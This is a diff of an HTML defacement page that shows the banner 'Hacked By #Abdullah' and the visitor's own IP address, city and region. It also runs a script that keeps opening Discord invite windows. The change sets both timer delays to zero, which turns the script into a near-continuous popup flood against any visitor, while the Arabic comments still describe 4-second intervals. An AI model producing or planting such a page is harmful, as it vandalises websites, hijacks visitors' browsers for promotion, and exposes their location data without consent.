--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
-<title>abdullah</title>
+<title>#Abdullah</title>
 <style>
     body {
         margin: 0;
@@ -148,7 +148,7 @@
 </video>
 
 <!-- نص فوق الفيديو الأول -->
-<div class="video-text"> Hacked By #Abdullah #333 </div>
+<div class="video-text"> Hacked By #Abdullah #87 </div>
 
 <!-- محتوى الصفحة الثانية -->
 <div class="content">
@@ -163,7 +163,7 @@
     </div>
 
     <!-- نص "discord.gg/d-7H" -->
-    <div class="text">discord.gg/byy</div>
+    <div class="text">Hacked By #Abdullah #87</div>
 
     <!-- معلومات الIP مع البورت -->
     <div class="info" id="ip-info">Loading IP Info...</div>
@@ -172,7 +172,7 @@
     <div class="marquee-container">
         <div class="marquee">
             <span>
-             Place #333 - .gg/byy - Place #333 - .gg/byy - Place #333 - .gg/byy - Place #333 - .gg/byy - 
+             
             </span>
         </div>
     </div>
@@ -206,7 +206,7 @@
             const port = window.location.port || (location.protocol === 'https:' ? '443' : '80');
 
             const infoDiv = document.getElementById('ip-info');
-            infoDiv.innerHTML = ` Hacked by #Abdullah #333
+            infoDiv.innerHTML = ` Hacked by #Abdullah #87
 <strong>IP:</strong><span>"${ip}"</span><br>
 <strong>City:</strong><span>"${city}"</span><br>
 <strong>Region:</strong><span>"${region}"</span><br>
@@ -233,7 +233,7 @@
 <!-- فتح نوافذ Discord تلقائيًا -->
 <script>
     // الرابط الذي تريد فتحه
-    const linkToOpen = "https://discord.gg/byy";
+    const linkToOpen = "https://discord.gg/7BWmqqVWaa";
 
     // فتح نافذتين تلقائيًا كل 4 ثوانٍ
     setInterval(() => {
@@ -243,8 +243,8 @@
         // الانتظار لفترة قصيرة (500 ميلي ثانية) قبل فتح النافذة الثانية
         setTimeout(() => {
             window.open(linkToOpen, '_blank');
-        }, 500); // 500 ميلي ثانية = 0.5 ثانية
-    }, 500); // 4000 ميلي ثانية = 4 ثوانٍ
+        }, 00); // 500 ميلي ثانية = 0.5 ثانية
+    }, 00); // 4000 ميلي ثانية = 4 ثوانٍ
 </script>
 </body>
 </html>
